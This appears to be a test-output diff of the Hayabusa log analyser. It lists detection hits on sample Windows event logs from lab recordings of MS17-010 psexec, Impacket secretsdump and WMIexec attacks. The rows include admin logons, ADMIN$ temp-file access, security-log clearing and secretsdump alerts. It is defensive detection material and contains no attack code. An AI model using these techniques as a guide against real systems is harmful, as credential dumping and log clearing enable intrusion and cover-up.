+2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60163  :  LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60285  :  LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60232  :  LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 50078  :  LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\BTeHLZkJ.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\NMdzZfem.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\BTeHLZkJ.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\NMdzZfem.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63558  :  LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63534  :  LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 50896  :  LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 56740  :  LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
